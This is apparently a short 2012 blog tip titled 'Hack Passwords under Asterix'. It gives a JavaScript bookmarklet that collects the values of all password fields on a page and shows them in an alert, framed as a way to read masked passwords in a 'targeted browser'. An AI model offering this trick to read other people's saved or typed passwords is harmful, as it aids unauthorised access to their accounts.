Saturday 12 May 2012

PASSWORDS UNDER ASTERIX


Tip#17 : Hack Passwords under Asterix:-



1.Copy and paste the following code in the targeted browser.

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords on this page:\n\n" + s); else alert("No passwords in on this page.");})();

2.now a box appears showing the password like the above picture

No comments:

Post a Comment